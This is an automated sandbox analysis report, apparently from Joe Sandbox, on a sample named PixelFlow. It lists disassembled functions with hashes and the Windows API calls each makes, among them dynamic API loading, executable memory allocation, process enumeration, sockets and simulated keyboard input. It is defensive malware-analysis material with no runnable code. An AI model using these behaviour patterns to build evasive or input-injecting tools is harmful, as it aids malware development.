Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: af78a5e238acc76b6a20740d137de22e03e10295f447808cb1f0e8fe606b3c4a
Instruction ID: 71dbb385ef44358ec2bbc06f50b634539ca6d1c25c1c0e1d1b7240ef660350b8
Opcode Fuzzy Hash: af78a5e238acc76b6a20740d137de22e03e10295f447808cb1f0e8fe606b3c4a
Instruction Fuzzy Hash: 3BD012715507128FD7205FB5D80858676DAAF25352B11CA2A9495DA660D670C5C1C711

Function 006155F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00615E3D), ref: 006155FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00615610

Strings

kernel32.dll, xrefs: 006155F9
GetNativeSystemInfo, xrefs: 0061560A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 613873b0aca0967109bd485ae320e77746532e7858765a96c92b6066f0bc9c78
Instruction ID: 577830f8d006fd5b064dd26f31be54a63656dfcfa1b4be767edf2d1ec6897aef
Opcode Fuzzy Hash: 613873b0aca0967109bd485ae320e77746532e7858765a96c92b6066f0bc9c78
Instruction Fuzzy Hash: 53D01275510712CFFB205F71D848696B6EAAF44355B15982AD496D2A61D770C4C0C690

Function 00679592 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,006791A6,?,00690980), ref: 006795A0
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006795B2

Strings

kernel32.dll, xrefs: 0067959B
GetModuleHandleExW, xrefs: 006795AC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: df5825d9f8ba193aa07512db8b19bccb4fd119736f5c48fabc2fbc8c76a63f61
Instruction ID: b28fa99fb47c20e0fdb10a8a7a4eaf535e3d7d28788f478291fc3c19ca490db8
Opcode Fuzzy Hash: df5825d9f8ba193aa07512db8b19bccb4fd119736f5c48fabc2fbc8c76a63f61
Instruction Fuzzy Hash: EAD01270510722CFF7215F71D81868676EAAF04351B11DC2AD899D2650D6B0C480C620

Function 00657B7E Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8af9f8a6706445241c1bf2c3c0657a89689f78e6f3f9534b2c40950b0a3fbd0
Instruction ID: d4b4a20c61e7347e80166132af2e636cd48db2f7b48175225e7057fad65dd281
Opcode Fuzzy Hash: e8af9f8a6706445241c1bf2c3c0657a89689f78e6f3f9534b2c40950b0a3fbd0
Instruction Fuzzy Hash: D1C13A75A04216EFCB14CFA4D884AAABBBAFF48715F118598E805EB251D730ED85CB90

Function 0067E4DB Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0067E56F
CharLowerBuffW.USER32(?,?), ref: 0067E5B2

Part of subcall function 0067DC56: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0067DC76

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0067E7B2
_memmove.LIBCMT ref: 0067E7C5

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 917598b900d9052e72c5a1780dd948de138e76e3a4edd5e8e9e9b8c6875a095b
Instruction ID: c96d21e638e8e439bb908ebc81055de995cb60fedfb4e00e636918c17dc5cf67
Opcode Fuzzy Hash: 917598b900d9052e72c5a1780dd948de138e76e3a4edd5e8e9e9b8c6875a095b
Instruction Fuzzy Hash: 48C18B71A043018FC754DF28C48095ABBE6FF89318F14896DF8999B351D732E94ACF82

Function 00678545 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00678575
CoUninitialize.OLE32 ref: 00678580

Part of subcall function 0068DC66: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,006787D6,?,00000000), ref: 0068DCCE

VariantInit.OLEAUT32(?), ref: 0067858B
VariantClear.OLEAUT32(?), ref: 0067885C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 19a4fcdcf811b5f0d6403ac76111cb2eba27e1016d2d967d6e096e1a41455b59
Instruction ID: 8ce1b69283c67b61d7b421db05f047d57adac16542ffd8470260a7d50c1f1dca
Opcode Fuzzy Hash: 19a4fcdcf811b5f0d6403ac76111cb2eba27e1016d2d967d6e096e1a41455b59
Instruction Fuzzy Hash: 0AA16AB52447019FD754EF24C485B2AB7E6BF88354F14884CFA9A9B3A1CB30ED01CB96

Function 0065727E Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0065728F
SysAllocString.OLEAUT32(00000000), ref: 00657338
VariantCopy.OLEAUT32 ref: 00657367
VariantClear.OLEAUT32(?), ref: 0065738E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 2040fffb10786f8ca46cd94b706139d3c6fd7b5689392b789da8295552309e3e
Instruction ID: eace435c9387e2a1db6eb057ae6e3ce7b475455799676dbc957a75d423b725a9
Opcode Fuzzy Hash: 2040fffb10786f8ca46cd94b706139d3c6fd7b5689392b789da8295552309e3e
Instruction Fuzzy Hash: 26510B306487069EDB649F65F891A6EF7EBEF54322F20881FED46CB291DB308845C715

Function 0067F2BE Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0067F2EE
Process32FirstW.KERNEL32(00000000,?), ref: 0067F2FC

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

Process32NextW.KERNEL32(00000000,?), ref: 0067F3BC
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0067F3CB

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: bb18c5c9e70163449785082bb95ec9324ddbc466adb0e4917be29dd0730b5f8a
Instruction ID: 700e3e3ea7015999e72386dc24d858d06acc47eebdd4d28acbf9d040872a1572
Opcode Fuzzy Hash: bb18c5c9e70163449785082bb95ec9324ddbc466adb0e4917be29dd0730b5f8a
Instruction Fuzzy Hash: 745180B1104311AFD360EF20DC81EABB7EAEF95750F00492DF695D7291EB709944CB96

Function 00689BE1 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00689C50
ScreenToClient.USER32(00000002,00000002), ref: 00689C83
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00689CF0

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 7a03c8d4b2563713cf35831c546460d5d2b3ddb952e1a52e124e55552d4bf9b5
Instruction ID: 4a52ada3fa3820a0e5d7450b130ddf00b52af6d800d28bbf44f0a19d3800ac16
Opcode Fuzzy Hash: 7a03c8d4b2563713cf35831c546460d5d2b3ddb952e1a52e124e55552d4bf9b5
Instruction Fuzzy Hash: 75510974A00509AFDB24EF54C884ABE7BB7FF45320F148259F9559B2A0D731AD41CBA4

Function 0062485A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006248F0
__flush.LIBCMT ref: 00624910
__write.LIBCMT ref: 00624943
__flsbuf.LIBCMT ref: 00624971

Part of subcall function 00628C88: __getptd_noexit.LIBCMT ref: 00628C88

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 0026fc4de93bf7faf9fae20565400f17ff7c17a1aa7c4b07e8a63e830ef2adbf
Instruction ID: 2329e59856f620d48cdc6dcfa255c755ba75f9bb4030c02316f299bf1121ba15
Opcode Fuzzy Hash: 0026fc4de93bf7faf9fae20565400f17ff7c17a1aa7c4b07e8a63e830ef2adbf
Instruction Fuzzy Hash: 3A41D371F14E669FDB188EA9E8809AB77A7AF85360B24813DE84587740DE74DD818F40

Function 0065A41B Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0065A46D
__itow.LIBCMT ref: 0065A49E

Part of subcall function 0065A6EE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0065A759

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0065A507
__itow.LIBCMT ref: 0065A55E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 9686d5cff766905b64182f0f1bb9d0ca2babd3cc350f594a6c563f3cba245a11
Instruction ID: ba068f3d0a7e4fa6da4bd34c67db6700a9463f12f860826183ddd99c4ef1f53b
Opcode Fuzzy Hash: 9686d5cff766905b64182f0f1bb9d0ca2babd3cc350f594a6c563f3cba245a11
Instruction Fuzzy Hash: B041B370A00209ABDF11DF94C855BFE7BBAEF45751F040129FE05A7381DB749A88CBA6

Function 00676E5A Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00676E81
WSAGetLastError.WSOCK32(00000000), ref: 00676E91

Part of subcall function 00604D37: __itow.LIBCMT ref: 00604D62
Part of subcall function 00604D37: __swprintf.LIBCMT ref: 00604DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00676EF5
WSAGetLastError.WSOCK32(00000000), ref: 00676F01

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: cd78727bb4794853b5c9be18f10a7512416ede048aaa68c2e08841ff8ce522e4
Instruction ID: 57df97481b6db39ec6f5f8eb5ad99924d86c9d5a480ff3510a38981cc93f34e4
Opcode Fuzzy Hash: cd78727bb4794853b5c9be18f10a7512416ede048aaa68c2e08841ff8ce522e4
Instruction Fuzzy Hash: F241A0B5780200AFEB64AF64DC86F7B77AA9F44B14F04841CFA199B3C2DA749D018B95

Function 006768CA Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00690980), ref: 00676957
_strlen.LIBCMT ref: 00676989

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: ab6dfb8b23a93ef0b3b9f154b9b1a021a4cea308c570be57f44524a2fe5a2425
Instruction ID: 6acf2ad1a1083ae2110e25dea8d22b4d69d00c5f3f6b0e8abb201044114a48be
Opcode Fuzzy Hash: ab6dfb8b23a93ef0b3b9f154b9b1a021a4cea308c570be57f44524a2fe5a2425
Instruction Fuzzy Hash: CF41D171A00505AFCB54FBA4DC91EEEB3ABAF44310F14C119F91A9B2D2EB30AD05CB94

Function 0066BCA4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0066BD4E
GetLastError.KERNEL32(?,00000000), ref: 0066BD74
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0066BD99
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0066BDC5

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: af4e3cf322a94b16cdf40a589e7e5fcfb7d78b191c193ce97d9974a4f1ea8360
Instruction ID: e5fef5744a95e0783fa50b7743fb232303485b03c6b0562ef22ae371862b046a
Opcode Fuzzy Hash: af4e3cf322a94b16cdf40a589e7e5fcfb7d78b191c193ce97d9974a4f1ea8360
Instruction Fuzzy Hash: 63415B75200A11DFCB65EF15C485A5EBBE2EF49310B09C488E94A9F3A2CB30FD41CB95

Function 00688C3E Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00688CCB

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: e849143135632c2d560956d1fc2aaf8f360a36cf37f194cf8e68114ab28eb3f7
Instruction ID: a198e8c83a36a1c289749f87746ddaacde890b4c2e3bb3e9a9a09b30051909d0
Opcode Fuzzy Hash: e849143135632c2d560956d1fc2aaf8f360a36cf37f194cf8e68114ab28eb3f7
Instruction Fuzzy Hash: AE31AF34641108AFEB24BF18CC89FE97767EF15310FA44616FA11E72E1CF70A9509BA5

Function 0068AF24 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0068AF4D
GetWindowRect.USER32(?,?), ref: 0068AFC3
PtInRect.USER32(?,?,0068C437), ref: 0068AFD3
MessageBeep.USER32(00000000), ref: 0068B044

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b445777cd5599c67007937d35607c5e022464cc21d1188cdfc2df64a94c5da99
Instruction ID: 12652ccb7200fb973903736b83864635833ad9189a43ec9353443d122cbde808
Opcode Fuzzy Hash: b445777cd5599c67007937d35607c5e022464cc21d1188cdfc2df64a94c5da99
Instruction Fuzzy Hash: 77415D70600219DFDB21EF58C884EAABBF7FF49310F1892A9E9249B351D731E942DB51

Function 00661141 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00661192
SetKeyboardState.USER32(00000080,?,00000001), ref: 006611AE
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00661214
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00661266

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: a938da36b9088d38e8a830fd91b736b4ca338d2a0a8227b09db21b820893b4fb
Instruction ID: fa4caf94cd0b63ebb886d133409acb0b9b44fdb5b741a1db28a8ba4fd5e98488
Opcode Fuzzy Hash: a938da36b9088d38e8a830fd91b736b4ca338d2a0a8227b09db21b820893b4fb
Instruction Fuzzy Hash: B9315C309402186EFF30CA258C157FABBAFAB47710F0C431AF591DA2D1C3754E9297A5

Function 0066127C Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 006612D1
SetKeyboardState.USER32(00000080,?,00008000), ref: 006612ED
PostMessageW.USER32(00000000,00000101,00000000), ref: 0066134C
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0066139E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 18095571d4cee6ec30eae08a52a2cface0498b366233d1c8277a8d121bd904f3
Instruction ID: 6d64064ccebf42fa555247a95ffdc90c9ed3196b7278d8cf302a66eb94fefcfb
Opcode Fuzzy Hash: 18095571d4cee6ec30eae08a52a2cface0498b366233d1c8277a8d121bd904f3
Instruction Fuzzy Hash: 31313830D40658AEFF348B698C047FABBBBAF46310F0C421AE4926ABD1C3758D559B95

Function 00636325 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0063635B
__isleadbyte_l.LIBCMT ref: 00636389
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006363B7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006363ED

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
